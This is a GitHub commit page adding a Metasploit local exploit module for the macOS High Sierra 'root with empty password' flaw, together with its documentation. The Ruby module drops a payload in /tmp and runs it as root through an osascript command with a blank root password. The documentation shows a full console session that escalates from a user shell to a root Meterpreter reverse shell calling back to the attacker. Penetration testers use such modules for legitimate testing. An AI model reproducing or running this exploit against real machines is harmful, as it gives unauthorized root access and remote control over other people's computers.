forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land rapid7#9255, add local exploit for osx root login with no password
Showing
2 changed files
with
159 additions
and
0 deletions.
There are no files selected for viewing
104 changes: 104 additions & 0 deletions
104
documentation/modules/exploit/osx/local/root_no_password.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,104 @@ | ||
## Vulnerable Application | ||
This vulnerability works against OSX 10.13 (High Sierra). Early | ||
research (https://objective-see.com/blog/blog_0x24.html) suggests that | ||
the vulnerability is the result of multiple errors ultimately started by | ||
an incorrect return value from triggered by the function | ||
`od_verify_crypt_password` returning true even if the account is | ||
disabled. The subsequent function calls appear to validate and create | ||
the password, though there is still a lot of research into the bug and | ||
these results should be verified once more research has been published. | ||
|
||
## Verification Steps | ||
1. Get a session on a vulnerable system | ||
2. `use exploit/osx/local/root_no_password` | ||
3. `set lhost <IP>` | ||
4. `set lport <PORT>` | ||
5. `set session <session_id>` | ||
6. `run` | ||
|
||
## Scenarios | ||
### Example Run | ||
``` | ||
msf exploit(psexec) > use exploit/multi/handler | ||
msf exploit(handler) > set payload osx/x64/meterpreter_reverse_tcp | ||
payload => osx/x64/meterpreter_reverse_tcp | ||
msf exploit(handler) > set lhost <MSF_IP> | ||
lhost => <MSF_IP> | ||
msf exploit(handler) > set lport 4567 | ||
lport => 4567 | ||
msf exploit(handler) > run | ||
[*] Started reverse TCP handler on <MSF_IP>:4567 | ||
httpserver[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <OSX_IP>:49347) at 2017-11-29 07:28:32 -0600 | ||
meterpreter > sysinfo | ||
Computer : msfusers-Mac.local | ||
OS : (MacOSX 17.0.0) | ||
Architecture : x64 | ||
Meterpreter : x64/osx | ||
meterpreter > getuid | ||
Server username: uid=501, gid=20, euid=501, egid=20 | ||
meterpreter > background | ||
[*] Backgrounding session 1... | ||
msf exploit(handler) > use exploit/osx/local/root_no_password | ||
msf exploit(root_no_password) > show options | ||
Module options (exploit/osx/local/root_no_password): | ||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
SESSION yes The session to run this module on. | ||
Payload options (osx/x64/meterpreter_reverse_tcp): | ||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
LHOST yes The listen address | ||
LPORT 4444 yes The listen port | ||
Exploit target: | ||
Id Name | ||
-- ---- | ||
0 Mac OS X 10.13.1 High Sierra x64 (Native Payload) | ||
msf exploit(root_no_password) > set lhost <MSF_IP> | ||
lhost => <MSF_IP> | ||
msf exploit(root_no_password) > set lport 4562 | ||
lport => 4562 | ||
msf exploit(root_no_password) > set session 1 | ||
session => 1 | ||
msf exploit(root_no_password) > run | ||
[*] Started reverse TCP handler on <MSF_IP>:4562 | ||
[*] Writing payload file as '/tmp/cinbvsmrmyxw' | ||
[*] Meterpreter session 2 opened (<MSF_IP>:4562 -> <OSX_IP>:62522) at 2017-11-29 07:29:56 -0600 | ||
[*] <OSX_IP> - Meterpreter session 2 closed. Reason: Died | ||
[*] Executing payload file as '/tmp/cinbvsmrmyxw' | ||
[!] This exploit may require manual cleanup of '/tmp/cinbvsmrmyxw' on the target | ||
[-] Invalid session identifier: 2 | ||
msf exploit(root_no_password) > | ||
msf exploit(root_no_password) > | ||
msf exploit(root_no_password) > run | ||
[*] Started reverse TCP handler on <MSF_IP>:4562 | ||
[*] Writing payload file as '/tmp/imtjkakowanv' | ||
[*] Executing payload file as '/tmp/imtjkakowanv' | ||
[*] Meterpreter session 3 opened (<MSF_IP>:4562 -> <OSX_IP>:49348) at 2017-11-29 07:30:53 -0600 | ||
[+] Deleted /tmp/imtjkakowanv | ||
meterpreter > sysinfo | ||
Computer : msfusers-Mac.local | ||
OS : (MacOSX 17.0.0) | ||
Architecture : x64 | ||
Meterpreter : x64/osx | ||
meterpreter > getuid | ||
Server username: uid=0, gid=20, euid=0, egid=20 | ||
meterpreter > | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,55 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Local | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Post::File | ||
include Msf::Exploit::EXE | ||
include Msf::Exploit::FileDropper | ||
|
||
def initialize(info={}) | ||
super(update_info(info, | ||
'Name' => 'Mac OS X Root Privilege Escalation', | ||
'Description' => %q{ | ||
This module exploits a serious flaw in MacOSX High Sierra. | ||
Any user can login with user "root", leaving an empty password. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'References' => | ||
[ | ||
[ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ], | ||
[ 'URL', 'https://news.ycombinator.com/item?id=15800676' ], | ||
[ 'URL', 'https://forums.developer.apple.com/thread/79235' ], | ||
], | ||
'Platform' => 'osx', | ||
'Arch' => ARCH_X64, | ||
'DefaultOptions' => | ||
{ | ||
'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp', | ||
}, | ||
'SessionTypes' => [ 'shell', 'meterpreter' ], | ||
'Targets' => [ | ||
[ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ] | ||
], | ||
'DefaultTarget' => 0, | ||
'DisclosureDate' => 'Nov 29 2017' | ||
)) | ||
end | ||
|
||
def exploit_cmd(root_payload) | ||
"osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'" | ||
end | ||
|
||
def exploit | ||
payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" | ||
print_status("Writing payload file as '#{payload_file}'") | ||
write_file(payload_file, payload.raw) | ||
register_file_for_cleanup(payload_file) | ||
output = cmd_exec("chmod +x #{payload_file}") | ||
print_status("Executing payload file as '#{payload_file}'") | ||
cmd_exec(exploit_cmd(payload_file)) | ||
end | ||
end |